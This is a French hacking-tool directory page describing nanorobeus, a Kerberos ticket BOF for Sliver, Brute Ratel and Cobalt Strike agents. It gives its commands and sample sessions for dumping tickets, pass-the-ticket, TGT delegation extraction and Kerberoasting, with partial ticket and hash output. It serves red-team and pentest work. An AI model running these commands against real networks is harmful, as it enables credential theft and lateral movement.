Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
nanorobeus — Fichier COFF (BOF) pour la gestion des tickets Kerberos. | Kitploit
Outils/GitHubGitHub/wavvs/nanorobeus
Attaques de Mots de PassePost-ExploitationAuthentificationRed Teaming
GitHubwavvs/nanorobeus

nanorobeus

Fichier COFF (BOF) pour la gestion des tickets Kerberos.

Voir le dépôt
328312il y a 3 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Nanorobeus

Fichier COFF (BOF) pour la gestion des tickets Kerberos.

Agents pris en charge

  • Sliver
  • Brute Ratel
  • Cobalt Strike

Commandes

luid - obtenir l'ID d'ouverture de session actuel

sessions [/luid:<0x0>| /all] - obtenir les sessions d'ouverture de session

klist [/luid:<0x0> | /all] - lister les tickets Kerberos

dump [/luid:<0x0> | /all] - extraire les tickets Kerberos

ptt /ticket:<base64> [/luid:<0x0>] - importer un ticket Kerberos dans une session d'ouverture de session

purge [/luid:<0x0>] - purger les tickets Kerberos

tgtdeleg /spn:<spn> - récupérer un TGT utilisable pour l'utilisateur actuel

kerberoast /spn:<spn> - effectuer une attaque Kerberoasting sur le SPN spécifié

Exemples

Obtenir l'ID d'ouverture de session actuel.

root@kitploit:~
=> nanorobeus64 luid

[+] Current LogonId: 0:0x19ea88e

Obtenir des informations détaillées sur la session d'ouverture de session actuelle.

root@kitploit:~
=> nanorobeus64 sessions

UserName                : User
Domain                  : FORTRESS
LogonId                 : 0:0x19ea88e
Session                 : 2
UserSID                 : S-1-5-21-1768674056-2740991423-664180583-1105
Authentication package  : Kerberos
LogonType               : Interactive
LogonTime (UTC)         : 2/7/2022 19:22:43
LogonServer             : SERVER
LogonServerDNSDomain    : FORTRESS.LOCAL
UserPrincipalName       : [email protected]

Lister les tickets Kerberos de la session d'ouverture de session actuelle. En mode élevé, utilisez /all pour lister les tickets de toutes les sessions ou /luid:0x0 pour lister les tickets d'une session d'ouverture de session spécifiée.

root@kitploit:~
=> nanorobeus64 klist

UserName                : User
Domain                  : FORTRESS
LogonId                 : 0:0x19ea88e
Session                 : 2
UserSID                 : S-1-5-21-1768674056-2740991423-664180583-1105
Authentication package  : Kerberos
LogonType               : Interactive
LogonTime (UTC)         : 2/7/2022 19:22:43
LogonServer             : SERVER
LogonServerDNSDomain    : FORTRESS.LOCAL
UserPrincipalName       : [email protected]

[*] Cached tickets: (6)

	[0]
	Client name     : User @ FORTRESS.LOCAL
	Server name     : krbtgt/FORTRESS.LOCAL @ FORTRESS.LOCAL
	Start time      : 2/7/2022 19:22:44 (UTC)
	End time        : 3/7/2022 5:22:43 (UTC)
	Renew time      : 9/7/2022 19:22:43 (UTC)
	Flags           : forwardable, forwarded, renewable, pre_authent, name_canonicalize (0x60a10000)
	Encryption type : AES256_CTS_HMAC_SHA1
    ...(snip)...

Extraire les tickets de la session d'ouverture de session actuelle. En mode élevé, utilisez /all pour extraire les tickets de toutes les sessions ou /luid:0x0 pour extraire les tickets d'une session d'ouverture de session spécifiée.

root@kitploit:~
=> nanorobeus64 dump

UserName                : User
Domain                  : FORTRESS
LogonId                 : 0:0x19ea88e
Session                 : 2
UserSID                 : S-1-5-21-1768674056-2740991423-664180583-1105
Authentication package  : Kerberos
LogonType               : Interactive
LogonTime (UTC)         : 2/7/2022 19:22:43
LogonServer             : SERVER
LogonServerDNSDomain    : FORTRESS.LOCAL
UserPrincipalName       : [email protected]

[*] Cached tickets: (6)

	[0]
	Client name     : User @ FORTRESS.LOCAL
	Server name     : krbtgt/FORTRESS.LOCAL @ FORTRESS.LOCAL
	Start time      : 2/7/2022 19:22:44 (UTC)
	End time        : 3/7/2022 5:22:43 (UTC)
	Renew time      : 9/7/2022 19:22:43 (UTC)
	Flags           : forwardable, forwarded, renewable, pre_authent, name_canonicalize (0x60a10000)
	Encryption type : AES256_CTS_HMAC_SHA1
	Ticket          : doIFFjCCBRKgAwIBBaEDAgEWooIEGTCCBBVhggQRMIIEDaADAg...(snip)...

Importer un ticket dans la session d'ouverture de session actuelle. En mode élevé, utilisez /luid:0x0 pour importer le ticket dans une session d'ouverture de session spécifiée.

root@kitploit:~
=> make_token network fortress.local test pass
=> nanorobeus64 ptt /ticket:doIFqjCCBaagAwIB...snip...

[+] Ticket successfully imported.

Purger tous les tickets Kerberos de la session d'ouverture de session actuelle. En mode élevé, utilisez /luid:0x0 pour purger les tickets d'une session d'ouverture de session spécifiée.

root@kitploit:~
=> nanorobeus64 purge

[+] Successfully purged tickets.

Récupérer un TGT utilisable pour l'utilisateur actuel.

root@kitploit:~
=> nanorobeus64 tgtdeleg /spn:cifs/server.fortress.local

[*] Found the AP-REQ delegation ticket in the GSS-API output
[*] Authenticator etype: AES256_CTS_HMAC_SHA1
[*] Successfully extracted the service ticket session key
[*] Successfully decrypted authenticator
[+] Successfully extracted TGT: doIFeDCCBXSgAwIBBaEDAgEWooIEcjC...(snip)...

Effectuer une attaque Kerberoasting en spécifiant le SPN :

root@kitploit:~
=> nanorobeus64 kerberoast /spn:HTTP/server.fortress.local

[*] Target SPN: HTTP/server.fortress.local
[+] Hash: $krb5tgs$23$*$FORTRESS.LOCAL$HTTP/server.fortress.local*$ac5e2f4d28fd377...(snip)...

Crédits

  • Rubeus - https://github.com/GhostPack/Rubeus
  • mimikatz - https://github.com/gentilkiwi/mimikatz
  • kekeo - https://github.com/gentilkiwi/kekeo
Télécharger l’outil